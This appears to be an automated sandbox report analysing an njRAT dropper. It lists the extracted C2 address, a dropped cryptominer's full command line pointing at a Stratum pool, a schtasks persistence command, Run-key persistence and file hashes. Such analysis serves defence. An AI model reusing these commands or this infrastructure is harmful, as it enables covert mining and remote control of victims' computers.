Analysis
-
max time kernel
151s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
20-05-2022 12:37
Static task
static1
Behavioral task
behavioral1
Sample
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
Resource
win7-20220414-en
Behavioral task
behavioral2
Sample
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
Resource
win10v2004-20220414-en
General
-
Target
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe
-
Size
1.1MB
-
MD5
bed8273f6aa0838212bfd15422318320
-
SHA1
ba3abe75066d40dd95ebe7b6a601fe005b4d2dfd
-
SHA256
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed
-
SHA512
6aa2021b5c559c856e53925f710646db430ca35f1bbe81f334e8275a3f9e9dded58bfb3c5839f9c7d453a2a8e69cdee67b43d3e4c9727c0a813f7ac2b14d2039
Malware Config
Extracted
njrat
Njrat 0.7 Golden By Hassan Amiri
HacKed
31.10.120.162:5555
Windows Update
-
reg_key
Windows Update
-
splitter
|Hassan|
Signatures
-
Detected Stratum cryptominer command
Looks to be attempting to contact Stratum mining pool.
-
Executes dropped EXE 5 IoCs
Processes:
system.exenikoVIRA alph 13.10.4.2.exeServer.exeServer.exeServer.exepid process 112 system.exe 1116 nikoVIRA alph 13.10.4.2.exe 1692 Server.exe 772 Server.exe 1940 Server.exe -
Drops startup file 2 IoCs
Processes:
Server.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe Server.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Java update.exe Server.exe -
Loads dropped DLL 7 IoCs
Processes:
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exenikoVIRA alph 13.10.4.2.exepid process 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe 1156 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe 1116 nikoVIRA alph 13.10.4.2.exe 1116 nikoVIRA alph 13.10.4.2.exe 1116 nikoVIRA alph 13.10.4.2.exe -
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exeServer.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Run 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\JELAHELMBKFGHEL = "C:\\Users\\Admin\\AppData\\Local\\Temp\\system.exe" 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe Set value (str) \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Roaming\\Server.exe\" .." Server.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Update = "\"C:\\Users\\Admin\\AppData\\Roaming\\Server.exe\" .." Server.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Server.exepid process 1692 Server.exe -
Suspicious use of AdjustPrivilegeToken 17 IoCs
Processes:
Server.exedescription pid process Token: SeDebugPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe Token: 33 1692 Server.exe Token: SeIncBasePriorityPrivilege 1692 Server.exe -
Suspicious use of WriteProcessMemory 28 IoCs
Processes:
3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exenikoVIRA alph 13.10.4.2.exeServer.exetaskeng.exedescription pid process target process PID 1964 wrote to memory of 112 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe system.exe PID 1964 wrote to memory of 112 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe system.exe PID 1964 wrote to memory of 112 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe system.exe PID 1964 wrote to memory of 112 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe system.exe PID 1964 wrote to memory of 1116 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe nikoVIRA alph 13.10.4.2.exe PID 1964 wrote to memory of 1116 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe nikoVIRA alph 13.10.4.2.exe PID 1964 wrote to memory of 1116 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe nikoVIRA alph 13.10.4.2.exe PID 1964 wrote to memory of 1116 1964 3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe nikoVIRA alph 13.10.4.2.exe PID 1116 wrote to memory of 2000 1116 nikoVIRA alph 13.10.4.2.exe NOTEPAD.EXE PID 1116 wrote to memory of 2000 1116 nikoVIRA alph 13.10.4.2.exe NOTEPAD.EXE PID 1116 wrote to memory of 2000 1116 nikoVIRA alph 13.10.4.2.exe NOTEPAD.EXE PID 1116 wrote to memory of 2000 1116 nikoVIRA alph 13.10.4.2.exe NOTEPAD.EXE PID 1116 wrote to memory of 1692 1116 nikoVIRA alph 13.10.4.2.exe Server.exe PID 1116 wrote to memory of 1692 1116 nikoVIRA alph 13.10.4.2.exe Server.exe PID 1116 wrote to memory of 1692 1116 nikoVIRA alph 13.10.4.2.exe Server.exe PID 1116 wrote to memory of 1692 1116 nikoVIRA alph 13.10.4.2.exe Server.exe PID 1692 wrote to memory of 680 1692 Server.exe schtasks.exe PID 1692 wrote to memory of 680 1692 Server.exe schtasks.exe PID 1692 wrote to memory of 680 1692 Server.exe schtasks.exe PID 1692 wrote to memory of 680 1692 Server.exe schtasks.exe PID 912 wrote to memory of 772 912 taskeng.exe Server.exe PID 912 wrote to memory of 772 912 taskeng.exe Server.exe PID 912 wrote to memory of 772 912 taskeng.exe Server.exe PID 912 wrote to memory of 772 912 taskeng.exe Server.exe PID 912 wrote to memory of 1940 912 taskeng.exe Server.exe PID 912 wrote to memory of 1940 912 taskeng.exe Server.exe PID 912 wrote to memory of 1940 912 taskeng.exe Server.exe PID 912 wrote to memory of 1940 912 taskeng.exe Server.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe"C:\Users\Admin\AppData\Local\Temp\3bb145b5108de842674b84ed2a006e8cbff59323b70a928da2ded92288bf05ed.exe"1⤵
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\system.exe"C:\Users\Admin\AppData\Local\Temp\system.exe" -a cryptonight -o stratum+tcp://btc.pool.minergate.com:45560 -u egacom2288@gmail.com -t 12⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exe"C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\Новый текстовый документ.txt3⤵
-
C:\Users\Admin\AppData\Roaming\Server.exe"C:\Users\Admin\AppData\Roaming\Server.exe"3⤵
- Executes dropped EXE
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn Server /tr C:\Users\Admin\AppData\Local\Temp/Server.exe4⤵
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {98EE2885-9776-48B8-BF1D-F5D00874A9A1} S-1-5-21-1819626980-2277161760-1023733287-1000:TBHNEBSE\Admin:Interactive:[1]1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Server.exeC:\Users\Admin\AppData\Local\Temp/Server.exe2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Server.exeC:\Users\Admin\AppData\Local\Temp/Server.exe2⤵
- Executes dropped EXE
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
C:\Users\Admin\AppData\Local\Temp\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
C:\Users\Admin\AppData\Local\Temp\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exeFilesize
710KB
MD5c93248685712aca2903f41280ebf535e
SHA11cc106d0822eecd8b9b6d56780fe19d826485768
SHA256c0014ac7d901c2e1231fa5e7734d5db64070dc08fb71adaf7720090f45d4e471
SHA51221ae26e97aec9feeae3b3205a159ba7407970c58029093969e6fb3dc5c776f83796d076c2f4e8823ac029beb629e8607f85fdf58170835d6e17b01930b2076fc
-
C:\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exeFilesize
710KB
MD5c93248685712aca2903f41280ebf535e
SHA11cc106d0822eecd8b9b6d56780fe19d826485768
SHA256c0014ac7d901c2e1231fa5e7734d5db64070dc08fb71adaf7720090f45d4e471
SHA51221ae26e97aec9feeae3b3205a159ba7407970c58029093969e6fb3dc5c776f83796d076c2f4e8823ac029beb629e8607f85fdf58170835d6e17b01930b2076fc
-
C:\Users\Admin\AppData\Local\Temp\system.exeFilesize
502KB
MD5806779989c6ea355a1abf4f6c7cb646c
SHA136d7f7a57e2a8ec953940d15099cae2fc565c16e
SHA256126395638de030e60d4a3a5cf7a8f8b664aac9ca37dc9a766182f8dfd5228fe4
SHA51287cb14530041b4c09e7de2f77b5a7e2d60278f6916dbed663a1e90e2b35d916f1ff05908ea562661bd5598c60799191ea95550e7e98e8b4ab218179217aecb51
-
C:\Users\Admin\AppData\Roaming\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
C:\Users\Admin\AppData\Roaming\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
C:\Users\Admin\AppData\Roaming\Новый текстовый документ.txtFilesize
55.5MB
MD590ad01221aca326184512bd924aa80b3
SHA15cadad1a1feed32529dd5c4f3a367588042206aa
SHA256fe63530654ff0f7e301429003c8400b35428252eb5df6a3cd28db53e98ad8055
SHA512a0c7a73074885394dbd80d55c711d2d77e34eac94f8bfaea5c3fb8f7837ec8583a6f186be8c8f37558b9bc6d25e97932b745884d4bdbc934d1d8f6a8f6eca08d
-
\Users\Admin\AppData\Local\Temp\nikoVIRA alph 13.10.4.2.exeFilesize
710KB
MD5c93248685712aca2903f41280ebf535e
SHA11cc106d0822eecd8b9b6d56780fe19d826485768
SHA256c0014ac7d901c2e1231fa5e7734d5db64070dc08fb71adaf7720090f45d4e471
SHA51221ae26e97aec9feeae3b3205a159ba7407970c58029093969e6fb3dc5c776f83796d076c2f4e8823ac029beb629e8607f85fdf58170835d6e17b01930b2076fc
-
\Users\Admin\AppData\Local\Temp\system.exeFilesize
502KB
MD5806779989c6ea355a1abf4f6c7cb646c
SHA136d7f7a57e2a8ec953940d15099cae2fc565c16e
SHA256126395638de030e60d4a3a5cf7a8f8b664aac9ca37dc9a766182f8dfd5228fe4
SHA51287cb14530041b4c09e7de2f77b5a7e2d60278f6916dbed663a1e90e2b35d916f1ff05908ea562661bd5598c60799191ea95550e7e98e8b4ab218179217aecb51
-
\Users\Admin\AppData\Local\Temp\system.exeFilesize
502KB
MD5806779989c6ea355a1abf4f6c7cb646c
SHA136d7f7a57e2a8ec953940d15099cae2fc565c16e
SHA256126395638de030e60d4a3a5cf7a8f8b664aac9ca37dc9a766182f8dfd5228fe4
SHA51287cb14530041b4c09e7de2f77b5a7e2d60278f6916dbed663a1e90e2b35d916f1ff05908ea562661bd5598c60799191ea95550e7e98e8b4ab218179217aecb51
-
\Users\Admin\AppData\Local\Temp\system.exeFilesize
502KB
MD5806779989c6ea355a1abf4f6c7cb646c
SHA136d7f7a57e2a8ec953940d15099cae2fc565c16e
SHA256126395638de030e60d4a3a5cf7a8f8b664aac9ca37dc9a766182f8dfd5228fe4
SHA51287cb14530041b4c09e7de2f77b5a7e2d60278f6916dbed663a1e90e2b35d916f1ff05908ea562661bd5598c60799191ea95550e7e98e8b4ab218179217aecb51
-
\Users\Admin\AppData\Roaming\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
\Users\Admin\AppData\Roaming\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
\Users\Admin\AppData\Roaming\Server.exeFilesize
43KB
MD5c43aaf0146a014160aaebe2f65150e62
SHA17c5bbccf84201c6bd05ed86c4ad88400a3d59575
SHA2564f927df346172359d5af13322514bb7ede61d35d6785729a563a872ac4a9ff13
SHA5128a5d258e76f29aa25985280169745dbc28e68d50dd6d8c784dfa5b7196abfc9b63cafa14c034d994b02444a311125e24f7ed302d0338ccc56fd2b5c7e420a64b
-
memory/112-72-0x0000000000400000-0x0000000000486000-memory.dmpFilesize
536KB
-
memory/112-57-0x0000000000000000-mapping.dmp
-
memory/680-77-0x0000000000000000-mapping.dmp
-
memory/772-79-0x0000000000000000-mapping.dmp
-
memory/772-81-0x00000000001A0000-0x00000000001B2000-memory.dmpFilesize
72KB
-
memory/1116-61-0x0000000000000000-mapping.dmp
-
memory/1692-75-0x00000000002F0000-0x0000000000302000-memory.dmpFilesize
72KB
-
memory/1692-70-0x0000000000000000-mapping.dmp
-
memory/1940-82-0x0000000000000000-mapping.dmp
-
memory/1964-54-0x0000000075401000-0x0000000075403000-memory.dmpFilesize
8KB
-
memory/2000-65-0x0000000000000000-mapping.dmp